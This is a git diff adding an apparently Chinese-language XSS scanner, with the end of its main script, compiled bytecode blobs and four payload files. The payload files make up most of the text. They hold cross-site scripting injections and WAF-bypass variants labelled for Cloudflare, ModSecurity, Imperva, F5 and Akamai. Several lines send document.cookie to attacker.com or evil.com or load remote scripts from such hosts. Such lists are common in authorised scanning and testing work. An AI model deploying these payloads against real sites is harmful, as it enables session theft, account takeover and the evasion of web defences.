+    # 配置扫描器
+    config = Config()
+    config.load_from_args(args)
+    
+    # 验证目标
+    targets = []
+    if args.url:
+        if validate_target(args.url):
+            targets.append(args.url)
+        else:
+            logger.error(f"无效的目标URL: {args.url}")
+            sys.exit(1)
+    elif args.file:
+        if not os.path.exists(args.file):
+            logger.error(f"文件不存在: {args.file}")
+            sys.exit(1)
+        with open(args.file, 'r') as f:
+            for line in f:
+                url = line.strip()
+                if validate_target(url):
+                    targets.append(url)
+    else:
+        logger.error("必须指定目标URL(-u)或包含目标的文件(-f)")
+        sys.exit(1)
+    
+    if not targets:
+        logger.error("没有有效的目标")
+        sys.exit(1)
+    
+    # 初始化扫描引擎
+    scanner = ScannerEngine(config)
+    
+    # 开始扫描
+    start_time = time.time()
+    logger.info(f"扫描开始，目标数量: {len(targets)}")
+    
+    results = []
+    for target in targets:
+        logger.info(f"正在扫描: {target}")
+        result = scanner.scan(target)
+        results.append(result)
+        
+    total_time = time.time() - start_time
+    
+    # 显示结果
+    display_results(results, total_time)
+    
+    # 生成报告
+    if args.output:
+        from xss_scanner.reporters.report_generator import generate_report
+        generate_report(results, args.output, args.format)
+        logger.info(f"报告已保存至: {args.output}")
+    
+    logger.info(f"扫描完成，总耗时: {total_time:.2f}秒")
+
+if __name__ == "__main__":
+    try:
+        main()
+    except KeyboardInterrupt:
+        print("\n用户中断，扫描已停止")
+        sys.exit(0)
+    except Exception as e:
+        print(f"发生错误: {str(e)}")
+        sys.exit(1) 
\ No newline at end of file
diff --git a/xss_scanner/payloads/xss/xss_level1.txt b/xss_scanner/payloads/xss/xss_level1.txt
new file mode 100644
index 0000000..ae0feee
--- /dev/null
+++ b/xss_scanner/payloads/xss/xss_level1.txt
@@ -0,0 +1,15 @@
+<script>alert('XSS')</script>
+<img src=x onerror=alert('XSS')>
+<svg onload=alert('XSS')>
+<body onload=alert('XSS')>
+<iframe onload=alert('XSS')></iframe>
+javascript:alert('XSS')
+<input autofocus onfocus=alert('XSS')>
+<select autofocus onfocus=alert('XSS')>
+<textarea autofocus onfocus=alert('XSS')>
+<keygen autofocus onfocus=alert('XSS')>
+<video><source onerror=alert('XSS')>
+<audio src=x onerror=alert('XSS')>
+"><script>alert('XSS')</script>
+'><script>alert('XSS')</script>
+><img src=x onerror=alert('XSS')> 
\ No newline at end of file
diff --git a/xss_scanner/payloads/xss/xss_level2.txt b/xss_scanner/payloads/xss/xss_level2.txt
new file mode 100644
index 0000000..fbd5db4
--- /dev/null
+++ b/xss_scanner/payloads/xss/xss_level2.txt
@@ -0,0 +1,29 @@
+# 基本混淆和绕过技术
+<script>eval(atob('YWxlcnQoJ1hTUycpOw=='))</script>
+<IMG SRC="javascript:alert('XSS');">
+<svg><script>alert&#40;1&#41</script>
+<body onpageshow=alert(1)>
+<body onload=alert('XSS')>
+<input type="text" value="" onfocus="alert('XSS')" autofocus>
+<video><source onerror="javascript:alert('XSS')">
+<iFrAme SRC="javascript:alert('XSS');"></iFramE>
+<div onmouseover="alert('XSS')">XSS</div>
+<marquee onstart='alert("XSS")'>XSS</marquee>
+<img src="/" onerror="alert(String.fromCharCode(88,83,83))"/>
+<svg onload="javascript:alert('XSS')" xmlns="http://www.w3.org/2000/svg"></svg>
+<style>@import 'data:text/css;base64,KiAge2JhY2tncm91bmQtaW1hZ2U6IHVybCgiamF2YXNjcmlwdDphbGVydCgiWFNTIikiKX0=')</style>
+<math><a xlink:href="javascript:alert(1)">click</a></math>
+<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
+<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
+<base href="javascript:alert('XSS')//">
+<script src="data:text/javascript,alert(1)"></script>
+<iframe src="javascript:alert('XSS');"></iframe>
+<form action="javascript:alert('XSS')"><input type="submit"></form>
+<isindex action="javascript:alert('XSS')" type=image>
+<input type="image" src="javascript:alert('XSS');">
+<table background="javascript:alert('XSS')">
+<button form="test" formaction="javascript:alert(1)">XSS</button>
+<meta http-equiv="refresh" content="0;url=javascript:alert('XSS');">
+<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>XSS</a>
+<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+$.$$_+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.__$+$.__$+$._+"(\\\"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\\")"+$.$$$_)())();</script>
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">XSS</a> 
\ No newline at end of file
diff --git a/xss_scanner/payloads/xss/xss_level3.txt b/xss_scanner/payloads/xss/xss_level3.txt
new file mode 100644
index 0000000..26aa120
--- /dev/null
+++ b/xss_scanner/payloads/xss/xss_level3.txt
@@ -0,0 +1,50 @@
+# 高级XSS有效载荷与绕过技术
+<script>Function("ale"+"rt(1)")();</script>
+<script>['ale'+'rt'](1)</script>
+<script>window['alert'](0)</script>
+<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
+<svg onload=prompt(1);>
+<script>new Function`alt\`1\``</script>
+<script>(()=>{return this})().alert(1)</script>
+<script>var{a:onerror}={a:eval};throw 'alert\x281\x29'</script>
+<img/id="'`-->" src=x onerror=javascript:alert(2)>
+<img src=x onerror=eval('\141\154\145\162\164\50\61\51')>
+<body/onhashchange=alert(1)><a href=#>click
+<iframe src=javascript:alert(1)//
+<script ~~~>confirm(1)</script ~~~>
+<script>$=Function,$($()\`alert\\\`1\\\`\`)();</script>
+<script>onerror=eval;throw'=alert\x281\x29';</script>
+<script>delete[a],alert(1)</script>
+<svg><discard onbegin=alert(1)>
+<math href="javascript:alert(1)">CLICKME</math>
+<img src=x:alert(alt) onerror=eval(src) alt=xss>
+<a href="j&Tab;a&Tab;v&Tab;asc&Tab;r&Tab;ipt&colon;confirm&lpar;1&rpar;">Click</a>
+<dETAILS open onToGgle=a=alert,a(1)>
+<iframe src="javascript:void(top[Object.keys(top)[2]](Object.keys(top)[5]))" width="500" height="500"></iframe>
+<embed code="//x.test/xss.swf" allowscriptaccess=always></embed>
+<svg><set onbegin=d=document;d.evaluate('\u0061lert(1)',d,null,6,null).iterateNext() >
+<iframe/onload=action=URL;Array(1).keys(a=function(...args)args[0].dispatchEvent(new+Event('focus'))).next(a(body.querySelector('input[autofocus]'))>
+<math><mtext><option><FAKEELEMENT><math><option><annotation-xml encoding="text/html"><iframe onload=alert(1)></iframe></annotation-xml></math></option></option></mtext></math>
+<style>:target {color:red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>
+<svg><animate onrepeat=alert(1) attributeName=x dur=1m></animate>
+<details/open=/id=x tabindex=1 onfocus=alert(1) id=x>
+<img src onerror=\u0065\u0076\u0061\u006c\u0028\u0061\u0074\u006f\u0062\u0028\u0027\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u0059\u0053\u0063\u0072\u0056\u006c\u004e\u0054\u004a\u0027\u0029\u0029>
+<iframe/src="data:text/html,<svg onload=confirm(1)>"><script>~'</script><!--<script>eval('var a=String.fromCharCode(47);var b=String.fromCharCode(42);var c=String.fromCharCode(42);var d=String.fromCharCode(47);eval(\'docu\'+\'ment.bod\'+\'y.inne\'+\'rHTML="Hac\'+\'ked"\');')</script>
+<object data="data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e"></object>
+<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
+<textarea id=ta onfocus=console.log(event)></textarea><div contenteditable onbeforeinput="ta.dispatchEvent(new InputEvent('input', {inputType: 'insertFromPaste', data: 'alert(1)', dataTransfer: new DataTransfer()}))"
+<div style="filter:url('data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>');">
+<iframe srcdoc="<script>top[8680439..toString(30)](1)</script>">
+<P%=tE%xt><svg/o%=nload=confirm(9)><ClIcK me</SvG>
+<svg><animate onbegin%3D=alert%26%23x28;)></animate>
+<input type="search" onsearch="alert()()()()" />
+<meta charset="x-mac-farsi">\u03C3cript\u03BE alert('xss');</script>
+<scr\0ipt>confirm(1)</scr\0ipt>
+<a onmouseover="document['cookie']=['Cookie Monster!']; alert(document['cookie'])">XSS</a>
+<img/src='data:image/svg+xml,<svg onload=alert(1)>' />
+<input onfocus="alert(document.domain);" autofocus>
+<script>throw{set:document.location='//attacker.com',name:'cookie',message:document.cookie}</script>
+<input autofocus="autofocus"onkeyup="this.focus();var a=this.style.box-shadow; a = document.domain; alert(a);" value="I contain info">
+<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11; id="fuzzelement1">test</a>
+<div style="background:url(http://foo.f/f ='`'><script>alert(1)</script>"><script>alert(1)</script>
+<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"></import> <t:set attributeName="innerHTML" targetElement="x" to="<img src=x onerror=alert(1)>"></t:set> 
\ No newline at end of file
diff --git a/xss_scanner/payloads/xss/xss_waf_bypass.txt b/xss_scanner/payloads/xss/xss_waf_bypass.txt
new file mode 100644
index 0000000..c2c1043
--- /dev/null
+++ b/xss_scanner/payloads/xss/xss_waf_bypass.txt
@@ -0,0 +1,69 @@
+# Cloudflare绕过
+<ScrIpT>prompt(1)</sCrIpT>
+<a/onmouseover=prompt(1)>XSS
+<a/href="j&#97v&#97script&#x3A;&#97lert(1)">XSS
+<svg/onload=confirm(String.fromCharCode(88,83,83))>
+<img/src="x"/onerror=document['cookie'];eval(atob('YWxlcnQoImNvb2tpZSBzdGVhbGVyIik7'));>
+<body/onwheel="[1].find(alert)">Roll ME
+<svg onload=setInterval`alert\u0028document.domain\u0029`>
+<x/onclick=document.location='http://xss.rocks/xss.js'>click me
+
+# ModSecurity绕过
+<details/open/ontoggle="alert`1`">XSS
+<a69/onclick=[1].map(alert)>XSS
+<IfRaMe/src=javascript:alert(1)>
+<l/onclick="[''].findIndex(alert)">l
+<%78%63%72%69%70%74>a=prompt;a(1);</%78%63%72%69%70%74>
+<img src=1 onerror="a=alert;a(1)">
+<img src=1 o&#x6e;error="javascript&colon;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;1&#x29;">
+
+# Imperva绕过
+<iframe/onload='this["src"]="javas&Tab;cript:document["locati&Tab;on"]["replace"]("https://evil.com/"+document["cookie"]);'>
+<img src=x:prompt(eval(atob('ZG9jdW1lbnQuY29va2ll')))>
+<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
+<scrIPT x=">" SRC="https://attacker.com/xss.js"></scrIPT>
+<d3"<"/onclick="1>[confirm``]"<">d3
+
+# F5 BIG-IP绕过
+<noscript><p title="</noscript><img src=x onerror=alert(1)>">
+<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>XSS
+<input type="text" value="> " onkeydown="prompt(1)" autofocus ">
+<form><button formaction=javascript&colon;alert(1)>XSS
+<img/src='x'%0Aonerror=confirm`1`>
+
+# Akamai绕过
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">XSS</a>
+<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
+<img src=``&NewLine; onerror=alert(1)&NewLine;``>
+<script>~'<script>'/**/;alert(1)//'</script>
+<style><script>a@import'//XSS.rocks'</script></style>
+
+# 通用WAF绕过
+<svg><animate onbegin=confirm() attributeName=x></svg>
+<script>$=1,$$='ale',$$$='rt',$$$$=`(1)`,eval($$+$$$+$$$$)</script>
+<details ontoggle=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>
+<img src=x onerror=\u0065\u0076\u0061\u006c('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>
+<body onpageshow=top['ale'+'rt']('1')>
+<body onpageshow=function(){eval(String.fromCodePoint(97,108,101,114,116,40,49,41))}>
+<math><xss href="javascript:alert(1)">XSS
+<a href="j&X41vascript&colon;alert&lpar;1&rpar;">XSS
+<button autofocus onfocus=top[11000000..toString(36)[0]+628..toString(36)[1]+'ert'](1)></button>
+<img/src="x"/onerror=top['\141\154\145\162\164'](1)>
+<svg><script>+(x=>document[`body`].appendChild(document[`createElement`](`img`)).src=`https://attacker.com/c/`+document[`cookie`])()</script>
+<a href=&#01javascript:alert(1)>XSS
+<img src="x" onerror="window&#46;document&#46;location = '//attacker.com/' + document&#46;cookie;">
+<iframe srcdoc="<a href='javascript:alert(1)'>XSS</a>"></iframe>
+
+# 混淆和编码组合
+<img src=x onerror="Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()">
+<body><template><s id=x onclick=alert()>XSS</s></template></body>
+<img src=x onerror=eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>
+<A HREF="h&#x74t&#x70&#x3a&#x2f&#x2f&#x67o&#x6f&#x67&#x6c&#x65&#x2e&#x63&#x6f&#x6d">XSS</A>
+<body><textarea onkeyup='javascript:"\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"'></textarea>
+<img%09onerror=alert(1) src=a>
+<i onclick=c&#39;onfirm(1)>click me</i>
+<div id="x">x</div><script>Object.prototype.BUMMER=1;document.getElementById('x').innerHTML='XSS'</script>
+<iframe src="javascript:(function(){var s=document.createElement('script');s.src='//attacker.com/hook.js';document.body.appendChild(s)})()"></iframe>
+<input autofocus onfocus="document.body.appendChild(document.createElement`img`).src='https://attacker.com/c/'+document.cookie">
+<math><mtext><option><FAKEELEMENT><math><option><annotation-xml encoding="text/html"><img src=x onerror=alert(1)><annotation-xml>
+<div id="div1"><input value="``onmouseover=alert(1)"></div><div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> 
\ No newline at end of file
diff --git a/xss_scanner/reporters/__init__.py b/xss_scanner/reporters/__init__.py
new file mode 100644
index 0000000..1915fcf
--- /dev/null
+++ b/xss_scanner/reporters/__init__.py
@@ -0,0 +1 @@
+"""XSS扫描器 - 报告生成模块""" 
\ No newline at end of file
diff --git a/xss_scanner/reporters/__pycache__/__init__.cpython-313.pyc b/xss_scanner/reporters/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..c7a174837becaf94104202b40181b062588f229d
GIT binary patch
literal 223
zcmey&%ge<81Uq!krfUG{#~=<2FhUuhIe?6*48aUV4C#!TOr?rIZbWeKv(DAe`um^G
zT%n+=@T_a;(}`Wrr_6uWG2z*Yg-_>B_tRv&#U3A@lAjzOzmnlI$f#T1&Q>v@#i>Qb
zF-GQwMrJWC`Q>>z`H3mTF+k(ugOd~U@=}X*a}zW3Vk(M@<BK5zF-55b`9&olZSnD$
sd6^~g@p=W7w>WHa^HWN5QtgV^fM$c-S`2dM2WCb_##;>PMJzxL0NH&;djJ3c

literal 0
HcmV?d00001

diff --git a/xss_scanner/reporters/__pycache__/report_generator.cpython-313.pyc b/xss_scanner/reporters/__pycache__/report_generator.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..8e5d763df71891da0d4513d0d9b76eef4d6ed069
GIT binary patch
literal 20731
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
